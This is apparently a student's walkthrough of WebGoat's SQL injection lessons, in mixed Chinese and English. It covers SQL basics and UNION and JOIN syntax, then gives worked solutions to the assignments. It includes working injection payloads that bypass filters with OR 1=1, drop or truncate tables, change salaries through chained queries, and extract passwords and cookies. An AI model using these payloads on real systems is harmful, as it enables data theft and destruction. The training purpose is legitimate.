A1:SQL Injection 1
Introduction
一、SQL语言
Data Manipulation Language (DML)
常用数据操作语言:
1 | SELECT -- retrieve data from a database |
Data Definition Language (DDL)
常用数据定义语言:
1 |
|
Data Control Language (DCL)
常用数据控制语言
1 | GRANT -- sql allow users access privileges to the database |
二、SQL注入
1.正常查询
1 | "SELECT * FROM users WHERE name = '" + userName + "'"; |
1 | "SELECT * FROM users WHERE name = 'Smith'"; |
2.简单注入
Here are some examples of what a hacker could supply to the input field to perform actions on the database that go further than just reading the data of a single user:
Smith’ OR '1' = '1 results in SELECT * FROM users WHERE name = 'Smith' OR TRUE; and that way will return all entries from the users table Smith’ OR 1 = 1; -- results in SELECT * FROM users WHERE name = 'Smith' OR TRUE;--'; and that way will return all entries from the users table Smith’; DROP TABLE users; TRUNCATE audit_log; -- chains multiple SQL-Commands and deletes the USERS table as well as entries from the audit_log
1.string SQL injection
2.Numeric SQL injection
3.Compromising confidentiality with String SQL injection
4.Compromising Integrity with Query chaining
Employee Name:1
Authentication TAN: 1’;update employees set salary=87000 where last_name=‘Smith’;–
5.Compromising Availability
Action contains:Smith‘;drop table access_log;–
advanced
1.Special Characters
1 | /* */ are inline comments |
1 | ; allows query chaining |
1 | ',+,|| allows string concatenation 字符串拼接 ' |
2.Special Statements
1.Union 并
The Union operator is used, to combine the results of two or more SELECT Statements.
Rules to keep in mind, when working with a UNION:
The number of columns selected in each statement must be the same.
The datatype of the first column in the first SELECT statement, must match the datatype of the first column in the second (third, fourth, …) SELECT Statement. The Same applies to all other columns.
1 | SELECT first_name FROM user_system_data UNION SELECT login_count FROM user_data; |
The UNION ALL Syntax also allows duplicate Values.
2.Joins 交
The Join operator is used to combine rows from two ore more tables, based on a related column
1 | SELECT * FROM user_data INNER JOIN user_data_tan ON user_data.userid=user_data_tan.userid; |
assignment on p3
解决方案1:
使用UNION运算:需要注意前后两条语句中查询的列的数目和每一列的数据类型一样。
解决方案2:
直接用“;”新增一条语句:
Name:1’or 1=1;select userid,user_name,password,cookie from user_system_data;–
Password:1’ or 1=1;–